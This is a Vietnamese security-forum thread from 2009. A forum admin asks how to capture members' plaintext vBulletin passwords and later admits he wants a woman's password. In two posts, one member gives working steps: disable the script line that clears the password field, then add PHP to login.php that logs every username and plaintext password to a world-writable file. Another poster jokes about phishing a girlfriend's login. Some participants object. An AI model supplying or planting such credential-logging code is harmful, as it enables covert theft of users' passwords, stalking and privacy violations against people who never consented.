Để biết pass của thành viên trong forum

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận thâm nhập

Để biết pass của thành viên trong forum

[Question] Để biết pass của thành viên trong forum	17/07/2009 06:33:54 (+0700) \| #1 \| 186535

boynet
Member

Joined: 10/07/2009 10:25:40
Messages: 32
Location: Hà Nội
Offline

Em là lính mới, có gì mong các bác thông cảm. Em là admin của 1 forum, trong thời gian gần đây có 1 số mem có ý đồ phá phách, gây rối. Em muốn biết pass của những thành viên này để theo dõi. Trước đây em có đọc 1 bài hướng dẫn admin lấy pass của mem nhưng giờ tìm mãi không thấy. Bác nào có thể cho link bài này, nếu không hướng dẫn chi tiết cho em với. em hoàn toàn không có dụng ý xấu nào cả, chỉ mong muốn kiểm soát các mem quá khích để ổn định hoạt động của forum thôi. Chân thành cảm ơn các bác trước!
P/s: em dùng forum Vbb

[Question] Để biết pass của thành viên trong forum	17/07/2009 12:06:10 (+0700) \| #2 \| 186564

lyhuuloi
Elite Member

Joined: 04/04/2003 11:29:17
Messages: 90
Location: TP HCM
Offline

Thế cái này là giúp chứ không phải học hỏi nhỉ, mình thì chỉ thích hướng dẫn chứ không thích làm cụ thể - và nhất là làm dùm, làm giúp smilie

Nên đây là cách làm smilie

Ngày xưa cũng vơ va vớ vẩn mà làm rồi sau đó lại bỏ vì thấy nó "quá đáng" smilie

Để có thể làm thì bác cần phải biết: 2 chữ "Lập trình" và cuối cùng là PHP smilie

Cách làm như sau:

1. Tìm đến đoạn xử lý đăng nhập của User

2. Bắt thông tin username và password lúc chưa bị mổ xẻ hay chấp vá gì hết

3. Sau đó lưu thông tin này vào 1 file .txt, ghi rõ "Username: XYZ, Password: ABC"

Rồi sau đó chỉ việc chờ Victim, à không, phải gọi là "mem có ý đồ pha phách" smilie

Cụ thể thế nào thì gồng mình lên nha bạn, có khó thì mới có kinh nghiệm smilie

http://lyhuuloi.com smilie

[Question] Để biết pass của thành viên trong forum	18/07/2009 05:41:53 (+0700) \| #3 \| 186629

ANKDPACN
Member

Joined: 23/05/2008 12:10:46
Messages: 36
Offline

:-< Admin đi phishing member, qả là 1 ý tg ko thể tuyệt vời hơn, sao mình ko nghĩ ra sớm hơn để chôm pass n` yêu nhỉ smilie

[Question] Để biết pass của thành viên trong forum	18/07/2009 05:43:44 (+0700) \| #4 \| 186631

lyhuuloi
Elite Member

Joined: 04/04/2003 11:29:17
Messages: 90
Location: TP HCM
Offline

Bác nên dừng ý tưởng đó đi smilie

Nó đã vi phạm quyền cá nhân trầm trọng rồi đó smilie

Trên mọi phương diện, đó đã là một cách lấy mật khẩu bất hợp pháp, híc.

http://lyhuuloi.com smilie

[Question] Để biết pass của thành viên trong forum	18/07/2009 19:39:00 (+0700) \| #5 \| 186705

TheShinichi
Member

Joined: 25/03/2005 01:40:31
Messages: 182
Offline

Híc, lạ quá, lần đầu tiên thấy có 1 Admin của forum phải tìm cách lấy password để ngăn chặn những member phá phách smilie

Chắc forum đấy không có chức năng "ban" !

[Question] Để biết pass của thành viên trong forum	18/07/2009 22:53:29 (+0700) \| #6 \| 186716

beginnerx1
Member

Joined: 13/08/2007 09:44:36
Messages: 15
Offline

Del nick thẳng tay chứ việc gì phải làm thế cho khổ ra. smilie

Trừ phi làm việc đó với 1 ý đồ đen tôi smilie

[Question] Để biết pass của thành viên trong forum	18/07/2009 23:06:53 (+0700) \| #7 \| 186717

boynet
Member

Joined: 10/07/2009 10:25:40
Messages: 32
Location: Hà Nội
Offline

việc ban hay del 1 user thì quá dễ rồi. Nhưng mem có ý định "chọc ngoáy" lại là người cùng cơ quan mới đau. Dĩ nhiên làm sao mà được lòng tất cả được, cũng có người này nọ. Admin biết pass cũng có thời gian đâu mà xăm soi hết các thành viên được, và nếu họ biết thì forum chỉ có nước là "sập tiệm". Mình chỉ theo dõi những đối tượng "khả nghi" mà không thể ban hay del họ được. Biết trước để ngăn chặn để dần dần họ từ bỏi ý định "chơi xấu" admin thôi. Nếu chỉ nêu các bước như ở trên (cái bác lyhuuloi đấy) thì ai mà chả nêu được smilie

. Vấn đề là làm như thế nào ? Em mà rành về lập trình thì đã tự mò rồi, hỏi các bác làm gì smilie

. Ai có lòng hảo tâm thì giúp em với, nếu không tiện thì gửi cho em Email: kehaodanh@yahoo.com (các bác đừng có "đính kèm" cho em 1 em trojan nào nhá, tội em lắm!). thanks!

[Question] Để biết pass của thành viên trong forum	18/07/2009 23:55:32 (+0700) \| #8 \| 186718

ANKDPACN
Member

Joined: 23/05/2008 12:10:46
Messages: 36
Offline

Chả hiểu cậu biết pass rồi thì cậu làm j người ta, theo dõi người ta kiểu j?
Cho mình biết phương án tiếp theo của bạn sau khi đã biết pass. :-s

[Question] Để biết pass của thành viên trong forum	19/07/2009 00:30:13 (+0700) \| #9 \| 186720

lyhuuloi
Elite Member

Joined: 04/04/2003 11:29:17
Messages: 90
Location: TP HCM
Offline

việc ban hay del 1 user thì quá dễ rồi. Nhưng mem có ý định "chọc ngoáy" lại là người cùng cơ quan mới đau. Dĩ nhiên làm sao mà được lòng tất cả được, cũng có người này nọ. Admin biết pass cũng có thời gian đâu mà xăm soi hết các thành viên được, và nếu họ biết thì forum chỉ có nước là "sập tiệm". Mình chỉ theo dõi những đối tượng "khả nghi" mà không thể ban hay del họ được. Biết trước để ngăn chặn để dần dần họ từ bỏi ý định "chơi xấu" admin thôi. Nếu chỉ nêu các bước như ở trên (cái bác lyhuuloi đấy) thì ai mà chả nêu được smilie . Vấn đề là làm như thế nào ? Em mà rành về lập trình thì đã tự mò rồi, hỏi các bác làm gì smilie . Ai có lòng hảo tâm thì giúp em với, nếu không tiện thì gửi cho em Email: kehaodanh@yahoo.com (các bác đừng có "đính kèm" cho em 1 em trojan nào nhá, tội em lắm!). thanks!

Hóa ra là ai cũng biết cách chứ không biết làm nhỉ smilie

Chắc lúc làm việc, Vấn đề nào bác không biết bác cũng nhờ người khác giúp luôn đúng không smilie

Tớ biết, nhưng tớ không muốn hướng dẫn cho bác ngay là để xem phản ứng của bác thế nào, như này thì hỏng cả. smilie

Thôi thì bác nào rãnh rỗi thì giúp bác ấy nhé smilie

http://lyhuuloi.com smilie

[Question] Để biết pass của thành viên trong forum	19/07/2009 00:37:59 (+0700) \| #10 \| 186721

jforum3000
Member

Joined: 26/08/2007 02:53:39
Messages: 1172
Offline

boynet, đây cũng là /hvaonline/posts/list/29910.html.

[Question] Để biết pass của thành viên trong forum	19/07/2009 00:41:00 (+0700) \| #11 \| 186722

lyhuuloi
Elite Member

Joined: 04/04/2003 11:29:17
Messages: 90
Location: TP HCM
Offline

jforum3000 wrote:

boynet, đây cũng là một cách để biết.

Cách này không dùng được đâu bạn smilie

Nó chỉ là mã md5, trong khi bác ấy lại cần password chính xác từng chữ mà smilie

http://lyhuuloi.com smilie

[Question] Để biết pass của thành viên trong forum	19/07/2009 23:20:41 (+0700) \| #12 \| 186807

boynet
Member

Joined: 10/07/2009 10:25:40
Messages: 32
Location: Hà Nội
Offline

Nói thì dễ mà làm thì mới khó, khó với người này nhưng dễ với người khác là chuyện bình thường. Dốt nhưng không giấu, chịu khó đi học hỏi là điều đáng quý chứ sao. Ai trước đây chẳng xuất phát từ lớp vỡ lòng a,b,c. Mỗi người có một ý tưởng khác nhau, nhưng em khẳng định việc làm này không phải mục đích xấu. Đã không biết mới hỏi mà các bác cứ: tự mò đi, tìm đi, lười thế, thiếu kiên nhẫn, biết ngay là lại hỏi...Diễn đàn để trao đổi, học hỏi mà toàn câu kiểu "thử phản ứng" chả trọng tâm tí nào. Ý kiến các bác phải rõ ràng: cái này không thể là được, muốn làm thì như thế này, hoặc làm được nhưng vi phạm pháp luật thì bạn tự chịu trách nhiệm v.v... Chứ cứ phán 1 câu: cái này tớ làm được nhưng không có thời gian chỉ, thông cảm nhá! Ai mà chả phán được vì có cách nào kiểm chứng được đâu smilie

[Question] Để biết pass của thành viên trong forum	20/07/2009 00:41:45 (+0700) \| #13 \| 186821

lyhuuloi
Elite Member

Joined: 04/04/2003 11:29:17
Messages: 90
Location: TP HCM
Offline

Tính không viết giúp bác rồi, nhưng hôm nay chủ nhật trời nóng quá, lại còn bị khích tướng nữa nên đành chiều ý bác, lập trình bao nhiêu năm bây giờ lại để người như bác ra sức "dạy dỗ" như vậy cũng không hay smilie

Cái này giống như kiểu, aha, ta vào một lớp học, ta hỏi thầy, "thầy ơi, vấn đề này em phải làm thế nào, thầy viết từ a-z cho em nhé", ok thế thì viết dùm đây, chắc chỉ có ở đây mới có như vậy thôi

Bước 1: Mở file clientscript/vbulletin_md5.js

Thay dòng:

input.value = '';

Thành:

//input.value = '';

Bước 2: Mở file login.php

Tìm đoạn:

Code:

if ($_POST['do'] == 'login')
{

Chèn vào bên dưới:

Code:

$fp = fopen("lyhuuloi.com.txt", "a+");

	fwrite($fp, "Username: {$_POST['vb_login_username']}
	Password: {$_POST['vb_login_password']}
	
	");
		
	rewind($fp);

Bước 3: Tạo file lyhuuloi.com.txt và CHMOD 777

Bước 4: Upload, rồi đợi. Kết quả được lưu vào file txt ấy nhé smilie

PS: Mình thì không thích vớ vẩn với bác, nhưng lần sau bác có yêu cầu thì nói đàng hoàng nhé, không phải ai cũng chỉ biết nói thôi đâu smilie

http://lyhuuloi.com smilie

[Question] Để biết pass của thành viên trong forum	20/07/2009 00:49:19 (+0700) \| #14 \| 186822

lyhuuloi
Elite Member

Joined: 04/04/2003 11:29:17
Messages: 90
Location: TP HCM
Offline

À sorry, các bác không nên lạm dụng nó nhé, vì cái này vi phạm quyền riêng tư trầm trọng đấy smilie

http://lyhuuloi.com smilie

[Question] Để biết pass của thành viên trong forum	20/07/2009 08:35:43 (+0700) \| #15 \| 186871

boynet
Member

Joined: 10/07/2009 10:25:40
Messages: 32
Location: Hà Nội
Offline

Cảm ơn bác đã giúp. Tuy nhiên em tìm trong file clientscript/vbulletin_md5.js thì không có đoạn input.value = ''; như hướng dẫn của bác. Em cài bản Vbb3.8.3, 1 phần của file clientscript/vbulletin_md5.js như thế này

var hexcase=0;var b64pad="";var chrsz=8;function hex_md5(A){return binl2hex(core_md5(str2binl(A),A.length*chrsz))}function b64_md5(A){return binl2b64(core_md5(str2binl(A),A.length*chrsz))}function str_md5(A){return binl2str(core_md5(str2binl(A),A.length*chrsz))}function hex_hmac_md5(A,B){return binl2hex(core_hmac_md5(A,B))}function b64_hmac_md5(A,B){return binl2b64(core_hmac_md5(A,B))}function str_hmac_md5(A,B){return binl2str(core_hmac_md5(A,B))}function core_md5(K,F){K[F>>5]|=128<<((F)%32);K[(((F+64)>>>9)<<4)+14]=F;var J=1732584193;var I=-271733879;var H=-1732584194;var G=271733878;for(var C=0;C<K.length;C+=16){var E=J;var D=I;var B=H;var A=G;J=md5_ff(J,I,H,G,K[C+0],7,-680876936);G=md5_ff(G,J,I,H,K[C+1],12,-389564586);H=md5_ff(H,G,J,I,K[C+2],17,606105819);I=md5_ff(I,H,G,J,K[C+3],22,-1044525330);J=md5_ff(J,I,H,G,K[C+4],7,-176418897);G=md5_ff(G,J,I,H,K[C+5],12,1200080426);H=md5_ff(H,G,J,I,K[C+6],17,-1473231341);I=md5_ff(I,H,G,J,K[C+7],22,-45705983);J=md5_ff(J,I,H,G,K[C+8],7,1770035416);G=md5_ff(G,J,I,H,K[C+9],12,-1958414417);H=md5_ff(H,G,J,I,K[C+10],17,-42063);I=md5_ff(I,H,G,J,K[C+11],22,-1990404162);J=md5_ff(J,I,H,G,K[C+12],7,1804603682);G=md5_ff(G,J,I,H,K[C+13],12,-40341101);H=md5_ff(H,G,J,I,K[C+14],17,-1502002290)

dò không có dòng input.value = '';. Em thử bỏ qua bước này thì không có kết quả trong file.txt. Mong bác xem lại giúp em.

[Question] Để biết pass của thành viên trong forum	20/07/2009 10:36:59 (+0700) \| #16 \| 186876

lyhuuloi
Elite Member

Joined: 04/04/2003 11:29:17
Messages: 90
Location: TP HCM
Offline

Đúng rồi

Đó là bước quan trọng nhất, vì phần đăng nhập của VBB đã dùng javascript để mã hóa md5() và sau đó thì nó xóa luôn giá trị password nguyên thủy mà bác vừa nhập, cho nên nếu không vô hiệu hóa cái dòng xóa giá trị này thì bác chỉ nhận được cái username thôi.

Uhm, bản vbb 3.8.3 đúng là không có dòng đó thật, vì trên máy mình chỉ có VBB 3.6.8, VBB 3.8.3 nó đã mã hóa luôn cái file javascript nên giá trị tìm đã thay đổi.

Và sau khi tìm hiểu sơ bộ thì phát hiện ra biến input lúc này đã đổi cái tên lại thành "B", cho nên ở bước 1 sẽ như thế này:

Mở file clientscript/vbulletin_md5.js, tìm dòng:

Code:

B.value=""

Rồi xóa luôn là ok !

http://lyhuuloi.com smilie

[Question] Để biết pass của thành viên trong forum	21/07/2009 00:51:38 (+0700) \| #17 \| 186934

boynet
Member

Joined: 10/07/2009 10:25:40
Messages: 32
Location: Hà Nội
Offline

Em làm đúng như bác hướng dẫn rồi, xóa B.value="" ở file clientscript/vbulletin_md5.js nhưng trong file .txt nó chỉ tìm được user thôi, còn dòng pass thì trắng tinh. Vậy phải làm sao hả bác lyhuuloi ? Em test nhiều lần rồi vẫn vậy. Bác cố gắng giúp em nha. thanks!

[Question] Để biết pass của thành viên trong forum	21/07/2009 00:57:51 (+0700) \| #18 \| 186935

lyhuuloi
Elite Member

Joined: 04/04/2003 11:29:17
Messages: 90
Location: TP HCM
Offline

OK, mình vừa tải VBB 3.83 về, giờ thì ăn cơm đã, khi nào rỗi việc sẽ vào test lại giúp bác ngay smilie

http://lyhuuloi.com smilie

[Question] Để biết pass của thành viên trong forum	21/07/2009 01:40:51 (+0700) \| #19 \| 186937

protectHat
Member

Joined: 09/08/2008 11:02:35
Messages: 176
Location: DMZ
Offline

Tôi thấy hành động này là không tốt. Kể cả lyhuuloi cũng thấy như vậy nhưng vẫn giúp là không được. Admin 1 forum sẽ có toàn quyền trên forum mình. Mọi phá phách đều có thể ban hoặc cấm.
Hành động này là lấy thông tin cá nhân, vd nếu người này mà dùng ps này vào 1 nơi nào khác nữa thì người admin này có thể lấy thông tin đó. Như là pass dd và pass vào ngân hàng online có cùng pass thì bác lyhuuloi cũng không tránh khỏi liên quan

[Question] Để biết pass của thành viên trong forum	21/07/2009 01:46:20 (+0700) \| #20 \| 186940

lyhuuloi
Elite Member

Joined: 04/04/2003 11:29:17
Messages: 90
Location: TP HCM
Offline

OK, bác protectHat nói đúng, có lẽ mình không nên giúp bác ấy smilie

Mong boynet hiểu nhé smilie

http://lyhuuloi.com smilie

[Question] Để biết pass của thành viên trong forum	21/07/2009 03:48:05 (+0700) \| #21 \| 186950

bolzano_1989
Journalist

Joined: 30/01/2007 12:49:15
Messages: 1406
Offline

Thật sự những bước lyhuuloi chỉ ra là rất rõ rồi, ai có năng lực tìm hiểu sẽ tự làm được thôi .
Từ giờ, tôi sẽ chú ý dùng pass ở diễn đàn khác với pass ở các trang khác . Thanks lyhuuloi .

Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY

[Question] Để biết pass của thành viên trong forum	21/07/2009 03:52:40 (+0700) \| #22 \| 186951

lyhuuloi
Elite Member

Joined: 04/04/2003 11:29:17
Messages: 90
Location: TP HCM
Offline

Đúng rồi, tốt nhất không nên tham gia nhiều diễn đàn, như mình khi tạo 1 account ở mỗi diễn đàn đều phải tự đặt key cho cái domain của diễn đàn đó.

Ví dụ: hvaonline --> hv@0l1n3123456 smilie

Như vậy có bị lấy password thì hậu quả để lại cũng sẽ giảm đáng kể smilie

http://lyhuuloi.com smilie

[Question] Để biết pass của thành viên trong forum	21/07/2009 08:52:31 (+0700) \| #23 \| 186987

boynet
Member

Joined: 10/07/2009 10:25:40
Messages: 32
Location: Hà Nội
Offline

Thực ra cái đó cũng không quá nghiêm trọng như protectHat nói đâu. Em chỉ muốn thể hiện một tí là admin, thế như dốt món code nên nhờ các bác. Vào forum chẳng ai dại gì đi lấy các thông tin quan trong làm pass. Rối mò mẫm trong hàng trăm thành viên cũng nhọc lắm. Mà như em đã nói nếu admin sử dụng với mục đích xấu thì trước sau người ta cũng phát hiện và 4rum đó đóng cửa là vừa. Điều này chắc chắn không admin nào muốn. Thôi đành nói thật là muốn biết pass của con nhỏ đang cua để lấy le í mà. Chứ chả phải làm gì đâu, các bác truy kĩ quá đành phải khai thật. Đã gần xong rồi, một lần nữa năn nỉ bác Lyhuuloi ra tay giúp em với, Em xin cảm ơn và hậu tạ!

[Question] Để biết pass của thành viên trong forum	21/07/2009 09:40:53 (+0700) \| #24 \| 186992

ANKDPACN
Member

Joined: 23/05/2008 12:10:46
Messages: 36
Offline

boynet wrote:

Thôi đành nói thật là muốn biết pass của con nhỏ đang cua để lấy le í mà. Chứ chả phải làm gì đâu, các bác truy kĩ quá đành phải khai thật. Đã gần xong rồi, một lần nữa năn nỉ bác Lyhuuloi ra tay giúp em với, Em xin cảm ơn và hậu tạ!

oái, té ra là n` cùng mục đích với tui à :p. Hjx, e chán forum roài, h làm cái trang login Y!M rồi phishing cho nó nhanh dù j GF cũng gà IT smilie

.
Mà chúc bác thành công nhé smilie

). Ai dè đi chôm pass GF làm je` cơ chứ :p

[Question] Để biết pass của thành viên trong forum	21/07/2009 09:40:57 (+0700) \| #25 \| 186993

ANKDPACN
Member

Joined: 23/05/2008 12:10:46
Messages: 36
Offline

boynet wrote:

Thôi đành nói thật là muốn biết pass của con nhỏ đang cua để lấy le í mà. Chứ chả phải làm gì đâu, các bác truy kĩ quá đành phải khai thật. Đã gần xong rồi, một lần nữa năn nỉ bác Lyhuuloi ra tay giúp em với, Em xin cảm ơn và hậu tạ!

oái, té ra là n` cùng mục đích với tui à :p. Hjx, e chán forum roài, h làm cái trang login Y!M rồi phishing cho nó nhanh dù j GF cũng gà IT smilie

.
Mà chúc bác thành công nhé smilie

). Ai dè đi chôm pass GF làm je` cơ chứ :p

[Question] Để biết pass của thành viên trong forum	21/07/2009 09:41:10 (+0700) \| #26 \| 186994

jforum3000
Member

Joined: 26/08/2007 02:53:39
Messages: 1172
Offline

[ngoài lề mà không phải ngoài lề]
Nếu thật sự yêu cô ấy thì khuyên bạn không nên dùng cách này.
[/ngoài lề mà không phải ngoài lề]

[Question] Để biết pass của thành viên trong forum	21/07/2009 10:18:27 (+0700) \| #27 \| 187001

phanledaivuong
Member

Joined: 23/05/2008 17:34:21
Messages: 315
Location: /dev/null
Offline

chài, lúc thi thành viên phá, lúc thì người yêu, toàn là ngụy biện thôi mà :-<
bảo người ta là cái gì muốn biết phải tự lo mà nghiên cứu lấy php với java script mà làm, hva có phải là mì ăn liền đâu :-<

[Question] Để biết pass của thành viên trong forum	21/07/2009 10:28:21 (+0700) \| #28 \| 187002

lyhuuloi
Elite Member

Joined: 04/04/2003 11:29:17
Messages: 90
Location: TP HCM
Offline

Khà khà, đang cua mà smilie

Đang cua thì tò mò, chứ đã quen rồi thì đừng nói là password, mà cả chìa khóa để cắm vào ổ khóa còn có smilie

)

http://lyhuuloi.com smilie

[Question] Để biết pass của thành viên trong forum	23/07/2009 13:12:37 (+0700) \| #29 \| 187250

khong_la_khong
Member

Joined: 22/07/2009 07:33:24
Messages: 1
Offline

vậy làm sao để biết trang www.xxx.xx chơi kiểu này

[Question] Để biết pass của thành viên trong forum	14/09/2009 00:09:38 (+0700) \| #30 \| 192654

Mr.Kee
Member

Joined: 09/08/2009 05:35:11
Messages: 1
Offline

Bác dow cái data về mà mò! smilie

)

Go to:

Users currently in here
1 Anonymous